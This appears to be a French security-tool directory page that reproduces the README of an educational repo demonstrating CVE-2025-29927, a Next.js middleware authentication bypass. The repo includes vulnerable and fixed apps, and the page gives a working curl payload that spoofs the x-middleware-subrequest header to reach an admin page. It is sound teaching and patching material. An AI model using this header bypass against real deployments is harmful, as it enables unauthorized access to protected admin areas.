Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/dante01yoon/cve-2025-29927
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebAuthentificationMauvaise ConfigurationApprentissage et Éducation
GitHubdante01yoon/cve-2025-29927

CVE-2025-29927

Démonstration de CVE-2025-29927 : contournement de l'authentification du middleware Next.js via l'usurpation de l'en-tête x-middleware-subrequest. Inclut des exemples d'applications vulnérables et corrigées pour l'éducation à la sécurité.

Voir le dépôt
50il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Démo de vulnérabilité Next.js (CVE-2025-29927)

Ce dépôt contient une démonstration de la vulnérabilité Next.js CVE-2025-29927, qui affecte les versions 15.2.2 et antérieures de Next.js. La vulnérabilité permet aux attaquants de contourner les contrôles d'authentification du middleware en définissant un en-tête x-middleware-subrequest.

Structure du dépôt

Il s'agit d'un monorepo NX contenant deux applications Next.js :

  1. vulnerable-app : Utilise Next.js 15.2.2 avec la vulnérabilité
  2. fixed-app : Utilise Next.js 15.2.3 avec le correctif appliqué

Explication de la vulnérabilité

Dans les versions de Next.js antérieures à 15.2.3, il existe une vulnérabilité de sécurité dans l'implémentation du middleware. Le middleware ne valide pas correctement l'origine de l'en-tête x-middleware-subrequest, permettant aux attaquants de falsifier cet en-tête et de contourner les contrôles d'authentification basés sur le middleware.

Comment exécuter la démo

Prérequis

  • Node.js 18 ou ultérieur
  • npm ou yarn
  • Docker (facultatif, pour un déploiement conteneurisé)

Exécution de l'application vulnérable

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the vulnerable app
cd apps/vulnerable-app
npm install

# Start the vulnerable app
npm run dev

L'application vulnérable sera disponible à l'adresse http://localhost:3000.

Exécution de l'application corrigée

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the fixed app
cd apps/fixed-app
npm install

# Start the fixed app
npm run dev

L'application corrigée sera disponible à l'adresse http://localhost:3001.

Utilisation de Docker

Vous pouvez également exécuter les applications avec Docker :

root@kitploit:~
# For the vulnerable app
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable

# For the fixed app
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed

Démonstration de la vulnérabilité

  1. Ouvrez l'application vulnérable (http://localhost:3000)
  2. Cliquez sur "Admin" dans la barre de navigation
  3. Vous serez redirigé vers la page de connexion car vous n'êtes pas authentifié
  4. Essayez maintenant d'accéder directement à la page admin avec la vulnérabilité :
root@kitploit:~
# Using curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

# Or use a browser extension like ModHeader to add the header
# and then visit http://localhost:3000/admin

Avec la version vulnérable (15.2.2), vous pourrez accéder à la page admin sans authentification en ajoutant l'en-tête x-middleware-subrequest.

Avec la version corrigée (15.2.3), le middleware valide correctement l'origine de cet en-tête, et vous serez toujours redirigé vers la page de connexion.

Identifiants de connexion

À des fins de démonstration, vous pouvez vous connecter avec :

  • Nom d'utilisateur : admin
  • Mot de passe : password123

Recommandation de sécurité

Si vous utilisez Next.js en production, assurez-vous de mettre à jour vers la version 15.2.3 ou ultérieure pour vous protéger contre cette vulnérabilité.

Télécharger l’outil